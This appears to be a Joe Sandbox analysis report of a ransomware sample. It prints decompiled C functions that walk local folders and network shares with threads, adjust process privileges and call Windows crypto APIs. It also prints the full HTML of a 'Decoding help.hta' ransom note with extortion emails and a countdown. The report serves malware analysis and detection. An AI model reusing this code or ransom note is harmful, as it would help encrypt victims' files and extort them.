    • String ID: $ $Decoding help.hta$F$\*.*$windows
    • API String ID: 1743110542-2524403619
    • Opcode ID: 4dc6aadf99c061102afc8f237ffd88845ec39796d56319ad5cd229dcb5d01f25
    • Instruction ID: 09e95a69dfff6291da4a77d36d8e93e18ae8ba3574d23d213d765ecb4674e2ae
    • Opcode Fuzzy Hash: 4dc6aadf99c061102afc8f237ffd88845ec39796d56319ad5cd229dcb5d01f25
    • Instruction Fuzzy Hash: BC5173719006097ACB21ABA1CC4AFDF76ACAF44308F14047BF949B61F1DB7D9A848B5D
    Uniqueness

    Uniqueness Score: -1,00%

    Function 004014CC, Relevance: 49.1, APIs: 24, Strings: 4, Instructions: 146stringfilesleepCOMMON
    Download Yara Rule

    Control-flow Graph

    C-Code - Quality: 97%
    			E004014CC(WCHAR* _a4) {
				void* _v8;
				void* _v12;
				struct _WIN32_FIND_DATAW _v604;
				struct _MEMORYSTATUS _v636;
				void* _t47;
				void* _t48;
				signed int _t59;
				WCHAR* _t83;
				WCHAR* _t94;
				WCHAR* _t98;
				WCHAR* _t99;
				void* _t101;
				void* _t102;

				_t47 = FindFirstFileW(_a4,  &_v604) + 1;
				if(_t47 == 0) {
					L22:
					_t48 = GlobalFree(_a4); // executed
					 *0x403ab7 =  *0x403ab7 - 1;
					return _t48;
				} else {
					_v12 = _t47 - 1;
					do {
						if((_v604.dwFileAttributes & 0x00000010) == 0) {
							E00401096(_a4);
							if(_v604.nFileSizeHigh != 0 || _v604.nFileSizeLow >= 0x20) {
								_t94 =  &(_v604.cFileName);
								if(lstrcmpiW(0x40379e, _t94) != 0) {
									_t59 = lstrlenW(_t94);
									if(_t59 <= 0x19 || lstrcmpiW(?str?, _t101 + _t59 * 2 - 0x234) != 0) {
										_t100 = _a4;
										lstrcatW(_t100 + 0x8020, _a4);
										 *(_t100 + 0x801a + lstrlenW(_t100 + 0x8020) * 2) = 0;
										lstrcatW(_t100 + 0x8020,  &(_v604.cFileName));
										lstrcatW(_t100 + 0x10040, _t100 + 0x8020);
										lstrcatW(_t100 + 0x10040, 0x4046f4);
										if((_v604.dwFileAttributes & 0x00000001) != 0) {
											_t100 = _a4;
											SetFileAttributesW( &(_a4[0x4010]), 0x80);
										}
										E0040128D(_t100 + 0x8020,  &_v604);
									}
								}
							}
							goto L20;
						}
						_t98 =  &(_v604.cFileName);
						if(lstrcmpW(0x403002, _t98) != 0 && lstrcmpW(0x403000, _t98) != 0 && lstrcmpiW(0x4037c4, _t98) != 0) {
							_t83 = E00401781(0x18060);
							_t99 = _t83;
							_v8 = _t83;
							lstrcatW(_t99, _a4);
							 *((char*)(_t99 + lstrlenW(_t99) * 2 - 6)) = 0;
							lstrcatW(_t99, _t98);
							lstrcatW(_t99, 0x403acb);
							while( *0x403ab7 > 0x64) {
								_v636.dwLength = 0x20;
								GlobalMemoryStatus( &_v636);
								if(_v636.dwMemoryLoad <= 0x46) {
									break;
								}
								Sleep(0x64);
							}
							 *0x403ab7 =  *0x403ab7 + 1;
							CloseHandle(CreateThread(0, 0x10000, E004014CC, _v8, 0, 0));
						}
						L20:
						asm("cld");
						memset( &(_a4[0x4010]), 0, 0x4010 << 2);
						_t102 = _t102 + 0xc;
					} while (FindNextFileW(_v12,  &_v604) != 0);
					FindClose(_v12);
					goto L22;
				}
			}
















    0x004014e4
    0x004014e5
    0x004016ed
    0x004016f0
    0x004016f5
    0x004016fc
    0x004014eb
    0x004014ec
    0x004014ef
    0x004014f8
    0x004015cf
    0x004015db
    0x004015eb
    0x004015fe
    0x00401605
    0x0040160d
    0x00401629
    0x00401636
    0x00401647
    0x00401660
    0x00401673
    0x00401684
    0x00401692
    0x00401694
    0x004016a3
    0x004016a3
    0x004016b6
    0x004016b6
    0x0040160d
    0x004015fe
    0x00000000
    0x004015db
    0x004014fe
    0x00401511
    0x00401542
    0x00401547
    0x00401549
    0x00401550
    0x0040155b
    0x00401562
    0x0040156d
    0x00401572
    0x0040157b
    0x0040158c
    0x00401598
    0x00000000
    0x00000000
    0x0040159c
    0x0040159c
    0x004015a3
    0x004015c2
    0x004015c2
    0x004016bb
    0x004016cb
    0x004016cc
    0x004016cc
    0x004016dd
    0x004016e8
    0x00000000
    0x004016e8

    APIs
    • FindFirstFileW.KERNEL32(?,?), ref: 004014DF
    • lstrcmpW.KERNEL32(00403002,?,?,?), ref: 0040150A
    • lstrcmpW.KERNEL32(00403000,?,00403002,?,?,?), ref: 0040151D
    • lstrcmpiW.KERNEL32(004037C4,?,00403000,?,00403002,?,?,?), ref: 00401530
      • Part of subcall function 00401781: GlobalAlloc.KERNEL32(00000040,00401160,?,00401160,00004000), ref: 00401789
      • Part of subcall function 00401781: Sleep.KERNEL32(000000C8,00000040,00401160,?,00401160,00004000), ref: 00401797
    • lstrcatW.KERNEL32(00000000,?), ref: 00401550
    • lstrlenW.KERNEL32(00000000,00000000,?,00018060,004037C4,?,00403000,?,00403002,?,?,?), ref: 00401556
    • lstrcatW.KERNEL32(00000000,?), ref: 00401562
    • lstrcatW.KERNEL32(00000000,00403ACB), ref: 0040156D
    • GlobalMemoryStatus.KERNEL32 ref: 0040158C
    • Sleep.KERNEL32(00000064,00000020), ref: 0040159C
    • CreateThread.KERNEL32 ref: 004015BC
    • CloseHandle.KERNEL32(00000000,00000000,00010000,004014CC,?,00000000,00000000,00000000,00403ACB,00000000,?,00000000,00000000,?,00018060,004037C4), ref: 004015C2
    • lstrcmpiW.KERNEL32(0040379E,?), ref: 004015F7
    • lstrlenW.KERNEL32(?,0040379E,?), ref: 00401605
    • lstrcmpiW.KERNEL32(Ug[R,?,?,0040379E,?), ref: 0040161C
    • lstrcatW.KERNEL32(?,?), ref: 00401636
    • lstrlenW.KERNEL32(?,?,?,?,0040379E,?), ref: 00401642
    • lstrcatW.KERNEL32(?,?), ref: 00401660
    • lstrcatW.KERNEL32(?,?), ref: 00401673
    • lstrcatW.KERNEL32(?,004046F4), ref: 00401684
    • SetFileAttributesW.KERNEL32(?,00000080,?,004046F4,?,?,?,?), ref: 004016A3
    • FindNextFileW.KERNEL32(?,?,0040379E,?), ref: 004016D8
    • FindClose.KERNEL32(?,?,?,0040379E,?), ref: 004016E8
    • GlobalFree.KERNEL32 ref: 004016F0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2314699615.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2314689692.0000000000400000.00000002.sdmp Download File
    • Associated: 00000000.00000002.2314712936.0000000000402000.00000002.sdmp Download File
    • Associated: 00000000.00000002.2314722815.0000000000403000.00000004.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_module.jbxd
    Similarity
    • API ID: lstrcat$FileFindGloballstrcmpilstrlen$CloseSleeplstrcmp$AllocAttributesCreateFirstFreeHandleMemoryNextStatusThread
    • String ID: $ $F$Ug[R
    • API String ID: 1743110542-829370647
    • Opcode ID: 4dc6aadf99c061102afc8f237ffd88845ec39796d56319ad5cd229dcb5d01f25
    • Instruction ID: 09e95a69dfff6291da4a77d36d8e93e18ae8ba3574d23d213d765ecb4674e2ae
    • Opcode Fuzzy Hash: 4dc6aadf99c061102afc8f237ffd88845ec39796d56319ad5cd229dcb5d01f25
    • Instruction Fuzzy Hash: BC5173719006097ACB21ABA1CC4AFDF76ACAF44308F14047BF949B61F1DB7D9A848B5D
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00401000, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 77stringencryptionCOMMON
    Download Yara Rule
    C-Code - Quality: 53%
    			_entry_(void* __ecx, signed int* __edx, void* __esi, WCHAR* _a4) {
				int _v8;
				long* _v12;
				long _v16;
				signed char _t32;
				signed int* _t56;

				_t56 = __edx;
				_v8 = 0x10f0;
				CryptAcquireContextA( &_v12, 0, 0, 0x18, 0xf0000000); // executed
				_t32 =  &_v16;
				_push(_t32);
				 *((intOrPtr*)(_t32 + 0x10)) = E004017A2;
				_push(0);
				_push(0);
				_push(0x2c);
				L2();
				 *_t56 =  *_t56 | _t32;
				 *_t32 =  *_t32 + _t32;
				asm("adc [esi], ah");
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				_t5 = __esi + 0x2f;
				 *_t5 =  *((intOrPtr*)(__esi + 0x2f)) + _t56;
				if( *_t5 <= 0) {
					_v12 = _t32;
					lstrcpyW(_v12, _a4);
					 *((char*)(_v12 + lstrlenW(_v12) * 2 - 6)) = 0;
					lstrcatW(_v12, L"Decoding help.hta");
					if(GetFileAttributesW(_v12) == 0xffffffff) {
						_v8 = CreateFileW(_v12, 0x40000000, 2, 0, 2, 0, 0);
						WriteFile(_v8, "<html><head><hta:application id=1\r\nshowInTaskBar=no\r\ncaption=no\r\nborder=none\r\ninnerBorder=no\r\nscroll=no\r\ncontextmenu=no\r\nwindowstate=maximize />\r\n<script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!=\'undefined\'?Y:now.getFullYear();Z=Z?Z-1:now.getMonth();D=typeof(D)!=\'undefined\'?D:now.getDate();H=typeof(H)!=\'undefined\'?H:now.getHours();M=typeof(M)!=\'undefined\'?M:now.getMinutes();var endDate=new Date(Y,Z,D,H,M,s+1);var i=setInterval(function(){var t=endDate.getTime()-now.getTime();if(t<0){clearInterval(i);alert(\'Time is up!\');}else{var d=Math.floor(t/864e5);var h=Math.floor(t/36e5)%24;var o=Math.floor(t/6e4)%60;var p=Math.floor(t/1e3)%60;var i=\'<div style=\"width:90px;float:left;text-align:center\"><div style=\"font-size:65px;\">\';var l=\'</div><div>\';var e=\'</div></div><div style=\"float:left;font-size:60px;\">:</div>\';document.getElementById(\'X\').innerHTML=i+d+l+\'Day\'+e+i+h+l+\'Hours\'+e+i+o+l+\'Minutes\'+e+i+p+l+\'Seconds\';if(!p&&!o&&!d&&!h){clearInterval(i);alert(\'Time is up!\');}}now.setSeconds(now.getSeconds()+1);},1000);}C(00,00,12,04,05,2019);</script></head><body style=\'text-align:center;background:#000\'></br></br></br><h2 style=\'font-size:40px;color:#b00\'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonStokton@tutanota.com</h2></br></br><h1 style=\'color:#FFF\'>Your<h2 style=\'font-size:40px;color:#00F\'> [ID]XE0PGVAVqcuaklH3[ID]</h2></br>1. In the subject line, write your ID.</br>2. Attach 1-2 infected files that do not contain important information (less than 2 mb)</br>are required to generate the decoder and restore the test file.</br>Hurry up! Time is limited!</br>Attention!!!</br>At the end of this time, the private key for generating the decoder will be destroyed. Files will not be restored!</h1></br></br><div id=\'X\' style=\'position:absolute;left:40%;color:#F00\'></div></body></html>",  *0x403ab3,  &_v16, 0);
						CloseHandle(_v8);
						SetFileAttributesW(_v12, 1);
					}
					return GlobalFree(_v12);
				} else {
					_push(0x35682128);
					_push(_t59);
					asm("enter 0xaaf5, 0x2b");
					asm("out dx, al");
					CryptImportKey(_v12); // executed
					CryptDecrypt(_v16, 0, 0, 0, 0x403000,  &_v8);
					CryptDestroyKey(_v16);
					return CryptReleaseContext(_v12, 0);
				}
			}








    0x00401000
    0x00401006
    0x0040101c
    0x00401021
    0x00401024
    0x00401025
    0x0040102e
    0x0040102f
    0x00401030
    0x00401032
    0x00401037
    0x00401039
    0x0040103b
    0x0040103e
    0x00401040
    0x00401042
    0x00401042
    0x00401045
    0x004010a6
    0x004010af
    0x004010bf
    0x004010cc
    0x004010dc
    0x004010f7
    0x0040110e
    0x00401116
    0x00401120
    0x00401120
    0x0040112e
    0x00401047
    0x0040104c
    0x00401052
    0x00401055
    0x0040105d
    0x00401066
    0x0040107d
    0x00401085
    0x00401095
    0x00401095

    APIs
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000), ref: 0040101C
      • Part of subcall function 00401063: CryptImportKey.ADVAPI32(?,00401037,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 00401066
      • Part of subcall function 00401063: CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00403000,004017A2,?,00401037,0000002C,00000000,00000000,?,?,00000000,00000000,00000018), ref: 0040107D
      • Part of subcall function 00401063: CryptDestroyKey.ADVAPI32(?,?,00000000,00000000,00000000,00403000,004017A2,?,00401037,0000002C,00000000,00000000,?,?,00000000,00000000), ref: 00401085
      • Part of subcall function 00401063: CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00403000,004017A2,?,00401037,0000002C,00000000,00000000,?,?), ref: 0040108F
    • lstrcpyW.KERNEL32 ref: 004010AF
    • lstrlenW.KERNEL32(?,?,?,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 004010B7
    • lstrcatW.KERNEL32(?,Decoding help.hta), ref: 004010CC
    • GetFileAttributesW.KERNEL32(?,?,?,?,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 004010D4
    • GlobalFree.KERNEL32 ref: 00401128
    Strings
    • Decoding help.hta, xrefs: 004010C4
    • <html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined, xrefs: 00401106
    Memory Dump Source
    • Source File: 00000000.00000001.593332961.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.593319076.0000000000400000.00000002.sdmp Download File
    • Associated: 00000000.00000001.593340737.0000000000402000.00000002.sdmp Download File
    • Associated: 00000000.00000001.593354738.0000000000403000.00000008.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_module.jbxd
    Similarity
    • API ID: Crypt$Context$AcquireAttributesDecryptDestroyFileFreeGlobalImportReleaselstrcatlstrcpylstrlen
    • String ID: <html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined$Decoding help.hta
    • API String ID: 2688160159-1737463546
    • Opcode ID: 7721281fa758cef1ce9fff004fb30370131a85719aa4915ed6ac0c0d516afdbb
    • Instruction ID: 68a9d78d6d026e3dd9675324c0a2f0f086f07bf2083e379a553c6848c7f92135
    • Opcode Fuzzy Hash: 7721281fa758cef1ce9fff004fb30370131a85719aa4915ed6ac0c0d516afdbb
    • Instruction Fuzzy Hash: 4021C130944348BADF22ABA1CD46F8EBF75EF05708F1040ABB240BA0F2C7B95A519758
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00401000, Relevance: 15.1, APIs: 10, Instructions: 77stringencryptionCOMMON
    Download Yara Rule

    Control-flow Graph

    C-Code - Quality: 53%
    			_entry_(void* __ecx, signed int* __edx, void* __esi, WCHAR* _a4) {
				int _v8;
				long* _v12;
				long _v16;
				signed char _t32;
				signed int* _t56;

				_t56 = __edx;
				_v8 = 0x10f0;
				CryptAcquireContextA( &_v12, 0, 0, 0x18, 0xf0000000); // executed
				_t32 =  &_v16;
				_push(_t32);
				 *((intOrPtr*)(_t32 + 0x10)) = E004017A2;
				_push(0);
				_push(0);
				_push(0x2c);
				L2();
				 *_t56 =  *_t56 | _t32;
				 *_t32 =  *_t32 + _t32;
				asm("adc [esi], ah");
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				_t5 = __esi + 0x2f;
				 *_t5 =  *((intOrPtr*)(__esi + 0x2f)) + _t56;
				if( *_t5 <= 0) {
					_v12 = _t32;
					lstrcpyW(_v12, _a4);
					 *((char*)(_v12 + lstrlenW(_v12) * 2 - 6)) = 0;
					lstrcatW(_v12, 0x40379e);
					if(GetFileAttributesW(_v12) == 0xffffffff) {
						_v8 = CreateFileW(_v12, 0x40000000, 2, 0, 2, 0, 0);
						WriteFile(_v8, 0x403006,  *0x403ab3,  &_v16, 0);
						CloseHandle(_v8);
						SetFileAttributesW(_v12, 1);
					}
					return GlobalFree(_v12);
				} else {
					_push(0x35682128);
					_push(_t59);
					asm("enter 0xaaf5, 0x2b");
					asm("out dx, al");
					CryptImportKey(_v12); // executed
					CryptDecrypt(_v16, 0, 0, 0, 0x403000,  &_v8);
					CryptDestroyKey(_v16);
					return CryptReleaseContext(_v12, 0);
				}
			}








    0x00401000
    0x00401006
    0x0040101c
    0x00401021
    0x00401024
    0x00401025
    0x0040102e
    0x0040102f
    0x00401030
    0x00401032
    0x00401037
    0x00401039
    0x0040103b
    0x0040103e
    0x00401040
    0x00401042
    0x00401042
    0x00401045
    0x004010a6
    0x004010af
    0x004010bf
    0x004010cc
    0x004010dc
    0x004010f7
    0x0040110e
    0x00401116
    0x00401120
    0x00401120
    0x0040112e
    0x00401047
    0x0040104c
    0x00401052
    0x00401055
    0x0040105d
    0x00401066
    0x0040107d
    0x00401085
    0x00401095
    0x00401095

    APIs
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000), ref: 0040101C
      • Part of subcall function 00401063: CryptImportKey.ADVAPI32(?,00401037,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 00401066
      • Part of subcall function 00401063: CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00403000,004017A2,?,00401037,0000002C,00000000,00000000,?,?,00000000,00000000,00000018), ref: 0040107D
      • Part of subcall function 00401063: CryptDestroyKey.ADVAPI32(?,?,00000000,00000000,00000000,00403000,004017A2,?,00401037,0000002C,00000000,00000000,?,?,00000000,00000000), ref: 00401085
      • Part of subcall function 00401063: CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00403000,004017A2,?,00401037,0000002C,00000000,00000000,?,?), ref: 0040108F
    • lstrcpyW.KERNEL32 ref: 004010AF
    • lstrlenW.KERNEL32(?,?,?,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 004010B7
    • lstrcatW.KERNEL32(?,0040379E), ref: 004010CC
    • GetFileAttributesW.KERNEL32(?,?,?,?,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 004010D4
    • GlobalFree.KERNEL32 ref: 00401128
    Memory Dump Source
    • Source File: 00000000.00000002.2314699615.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2314689692.0000000000400000.00000002.sdmp Download File
    • Associated: 00000000.00000002.2314712936.0000000000402000.00000002.sdmp Download File
    • Associated: 00000000.00000002.2314722815.0000000000403000.00000004.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_module.jbxd
    Similarity
    • API ID: Crypt$Context$AcquireAttributesDecryptDestroyFileFreeGlobalImportReleaselstrcatlstrcpylstrlen
    • String ID:
    • API String ID: 2688160159-0
    • Opcode ID: 7721281fa758cef1ce9fff004fb30370131a85719aa4915ed6ac0c0d516afdbb
    • Instruction ID: 68a9d78d6d026e3dd9675324c0a2f0f086f07bf2083e379a553c6848c7f92135
    • Opcode Fuzzy Hash: 7721281fa758cef1ce9fff004fb30370131a85719aa4915ed6ac0c0d516afdbb
    • Instruction Fuzzy Hash: 4021C130944348BADF22ABA1CD46F8EBF75EF05708F1040ABB240BA0F2C7B95A519758
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00401DE7, Relevance: 6.0, APIs: 4, Instructions: 35COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 118 401de7-401dfc OpenProcessToken 119 401e49-401e4a 118->119 120 401dfe-401e0e LookupPrivilegeValueA 118->120 121 401e10-401e1b 120->121 122 401e41-401e44 CloseHandle 120->122 123 401e26 121->123 124 401e1d-401e24 121->124 122->119 125 401e2d-401e3c AdjustTokenPrivileges 123->125 124->125 125->122
    C-Code - Quality: 100%
    			E00401DE7(CHAR* _a4, intOrPtr _a8) {
				void* _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				int _t12;
				int _t14;
				int _t15;

				_t12 = OpenProcessToken(0xffffffff, 0x28,  &_v8);
				if(_t12 != 0) {
					_t14 = LookupPrivilegeValueA(0, _a4,  &(_v24.Privileges)); // executed
					if(_t14 != 0) {
						_v24.PrivilegeCount = 1;
						if(_a8 != 1) {
							_v12 = 0;
						} else {
							_v12 = 2;
						}
						AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
					}
					_t15 = CloseHandle(_v8); // executed
					return _t15;
				}
				return _t12;
			}









    0x00401df5
    0x00401dfc
    0x00401e07
    0x00401e0e
    0x00401e10
    0x00401e1b
    0x00401e26
    0x00401e1d
    0x00401e1d
    0x00401e1d
    0x00401e3c
    0x00401e3c
    0x00401e44
    0x00000000
    0x00401e44
    0x00401e4a

    APIs
    • OpenProcessToken.ADVAPI32(000000FF,00000028,00008000,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000,00000000,00403ABB), ref: 00401DF5
    • LookupPrivilegeValueA.ADVAPI32(00000000,00008000,00000000), ref: 00401E07
    • AdjustTokenPrivileges.ADVAPI32(00008000,00000000,00000001,00000000,00000000,00000000,000000FF,00000028,00008000,00000500,00000000,00000000,00000000,?,00000114,00000500), ref: 00401E3C
    • CloseHandle.KERNEL32(00008000,000000FF,00000028,00008000,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000,00000000), ref: 00401E44
    Memory Dump Source
    • Source File: 00000000.00000002.2314699615.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2314689692.0000000000400000.00000002.sdmp Download File
    • Associated: 00000000.00000002.2314712936.0000000000402000.00000002.sdmp Download File
    • Associated: 00000000.00000002.2314722815.0000000000403000.00000004.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_module.jbxd
    Similarity
    • API ID: Token$AdjustCloseHandleLookupOpenPrivilegePrivilegesProcessValue
    • String ID:
    • API String ID: 3109822214-0
    • Opcode ID: 6261509aeb84146fd0344f28abf3e6b066f36324f230cbae9dab4de075546fd3
    • Instruction ID: 2d62ae5741bd0bd10fc8f8dde8b80465d76495da62fb8ef1b7503070adc41f60
    • Opcode Fuzzy Hash: 6261509aeb84146fd0344f28abf3e6b066f36324f230cbae9dab4de075546fd3
    • Instruction Fuzzy Hash: 05F03070540209BAEF10EB91CD06FAEB7BCAB04718F204136BE10B51E1D7B89B449BA9
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00401063, Relevance: 6.0, APIs: 4, Instructions: 17encryptionCOMMON
    Download Yara Rule

    Control-flow Graph

    C-Code - Quality: 58%
    			E00401063() {
				void* _t11;

				CryptImportKey( *(_t11 - 8)); // executed
				CryptDecrypt( *(_t11 - 0xc), 0, 0, 0, 0x403000, _t11 - 4);
				CryptDestroyKey( *(_t11 - 0xc));
				return CryptReleaseContext( *(_t11 - 8), 0);
			}




    0x00401066
    0x0040107d
    0x00401085
    0x00401095

    APIs
    • CryptImportKey.ADVAPI32(?,00401037,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 00401066
    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00403000,004017A2,?,00401037,0000002C,00000000,00000000,?,?,00000000,00000000,00000018), ref: 0040107D
    • CryptDestroyKey.ADVAPI32(?,?,00000000,00000000,00000000,00403000,004017A2,?,00401037,0000002C,00000000,00000000,?,?,00000000,00000000), ref: 00401085
    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00403000,004017A2,?,00401037,0000002C,00000000,00000000,?,?), ref: 0040108F
    Memory Dump Source
    • Source File: 00000000.00000002.2314699615.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2314689692.0000000000400000.00000002.sdmp Download File
    • Associated: 00000000.00000002.2314712936.0000000000402000.00000002.sdmp Download File
    • Associated: 00000000.00000002.2314722815.0000000000403000.00000004.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_module.jbxd
    Similarity
    • API ID: Crypt$ContextDecryptDestroyImportRelease
    • String ID:
    • API String ID: 1768642135-0
    • Opcode ID: 0cb5ec14dbd97b43e308b96a0546c7c58cdb3d5023f843da73e9d6abf324567d
    • Instruction ID: 2bc5181ffc75bb41a3a1a8c5b4f242b06071d8065f7857b9d8ecca6836cf1f6b
    • Opcode Fuzzy Hash: 0cb5ec14dbd97b43e308b96a0546c7c58cdb3d5023f843da73e9d6abf324567d
    • Instruction Fuzzy Hash: 52D09E34A40109B9DF11BBA1DC03F9CBA369F0070CF3041B6B100740F287B56A11560C
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00401131, Relevance: 18.1, APIs: 12, Instructions: 107sharestringthreadCOMMON
    Download Yara Rule
    C-Code - Quality: 97%
    			E00401131(struct _NETRESOURCE* _a4) {
				char* _v8;
				short* _v12;
				int _v16;
				int _v20;
				void* _v24;
				signed int _v32;
				void* _v36;
				int _t43;
				int _t45;
				char* _t46;
				void* _t47;
				int _t50;
				struct _NETRESOURCE* _t56;
				int _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t71;
				void* _t78;

				_t43 = WNetOpenEnumA(2, 0, 0, _a4,  &_v36); // executed
				if(_t43 != 0) {
					L12:
					_t45 = WNetCloseEnum(_v36); // executed
					return _t45;
				}
				_v20 = 0x4000;
				_t46 = E00401781(_v20); // executed
				_v8 = _t46;
				_t47 = E00401781(_v20); // executed
				_v24 = _t47;
				_v16 = 0xffffffff;
				_t50 = WNetEnumResourceA(_v36,  &_v16, _v24,  &_v20); // executed
				if(_t50 == 0xea) {
					GlobalFree(_v24);
					_v24 = E00401781(_v20);
					_v16 = 0xffffffff;
					_t50 = WNetEnumResourceA(_v36,  &_v16, _v24,  &_v20);
				}
				if(_t50 != 0) {
					L11:
					GlobalFree(_v8); // executed
					GlobalFree(_v24); // executed
					goto L12;
				} else {
					_v32 = 0;
					while(1) {
						_t56 = _v24 + (_v32 << 5);
						if( *((intOrPtr*)(_t56 + 0xc)) == 1) {
							_t71 =  *(_t56 + 0x14);
							if( *_t71 == 0x5c5c) {
								_t58 = lstrlenA(_t71);
								asm("cld");
								_t59 = memcpy(_v8, _t71, _t58);
								_t78 = _t78 + 0xc;
								_t60 = _t59 + _v8;
								 *_t60 = 0x2a2e2a5c;
								 *((char*)(_t60 + 4)) = 0;
								_v12 = E00401781(0x18060);
								MultiByteToWideChar(3, 0, _v8, 0xffffffff, _v12, MultiByteToWideChar(3, 0, _v8, 0xffffffff, _v12, 0));
								 *0x403ab7 =  *0x403ab7 + 1;
								CloseHandle(CreateThread(0, 0x10000, E004014CC, _v12, 0, 0));
							}
						} else {
							E00401131(_t56); // executed
						}
						_v32 = _v32 + 1;
						if(_v32 >= _v16) {
							goto L11;
						}
					}
					goto L11;
				}
			}





















    0x00401144
    0x0040114b
    0x00401281
    0x00401284
    0x0040128a
    0x0040128a
    0x00401151
    0x0040115b
    0x00401160
    0x00401166
    0x0040116b
    0x0040116e
    0x00401183
    0x0040118d
    0x00401192
    0x0040119f
    0x004011a2
    0x004011b7
    0x004011b7
    0x004011be
    0x00401271
    0x00401274
    0x0040127c
    0x00000000
    0x004011c4
    0x004011c4
    0x004011cb
    0x004011d1
    0x004011d8
    0x004011e4
    0x004011ec
    0x004011ef
    0x004011fb
    0x004011fc
    0x004011fc
    0x004011fe
    0x00401201
    0x00401207
    0x00401215
    0x00401238
    0x0040123d
    0x0040125c
    0x0040125c
    0x004011dc
    0x004011dd
    0x004011dd
    0x00401261
    0x0040126a
    0x00000000
    0x00000000
    0x0040126c
    0x00000000
    0x004011cb

    APIs
    • WNetOpenEnumA.MPR(00000002,00000000,00000000,?,?), ref: 00401144
    • WNetCloseEnum.MPR(?), ref: 00401284
      • Part of subcall function 00401781: GlobalAlloc.KERNEL32(00000040,?,?,004010A6,00008000), ref: 00401789
      • Part of subcall function 00401781: Sleep.KERNEL32(000000C8,00000040,?,?,004010A6,00008000), ref: 00401797
    • WNetEnumResourceA.MPR(?,FFFFFFFF,?,00004000), ref: 00401183
    • GlobalFree.KERNEL32 ref: 00401192
    • WNetEnumResourceA.MPR(?,FFFFFFFF,?,00004000), ref: 004011B7
    • lstrlenA.KERNEL32(?,00004000,00004000), ref: 004011EF
    • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,?,00000000,00018060,?,00004000,00004000), ref: 00401226
    • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,?,00000000,00000003,00000000,00000000,000000FF,?,00000000,00018060,?,00004000,00004000), ref: 00401238
    • CreateThread.KERNEL32 ref: 00401256
    • CloseHandle.KERNEL32(00000000,00000000,00010000,Function_000014CC,?,00000000,00000000,00000003,00000000,00000000,000000FF,?,00000000,00000003,00000000,00000000), ref: 0040125C
    • GlobalFree.KERNEL32 ref: 00401274
    • GlobalFree.KERNEL32 ref: 0040127C
    Memory Dump Source
    • Source File: 00000000.00000001.593332961.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.593319076.0000000000400000.00000002.sdmp Download File
    • Associated: 00000000.00000001.593340737.0000000000402000.00000002.sdmp Download File
    • Associated: 00000000.00000001.593354738.0000000000403000.00000008.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_module.jbxd
    Similarity
    • API ID: EnumGlobal$Free$ByteCharCloseMultiResourceWide$AllocCreateHandleOpenSleepThreadlstrlen
    • String ID:
    • API String ID: 3520587307-0
    • Opcode ID: 9d12d4a99be906757fec16f8f7037c86217b6b9286bb6862ec45515e6ecea0d5
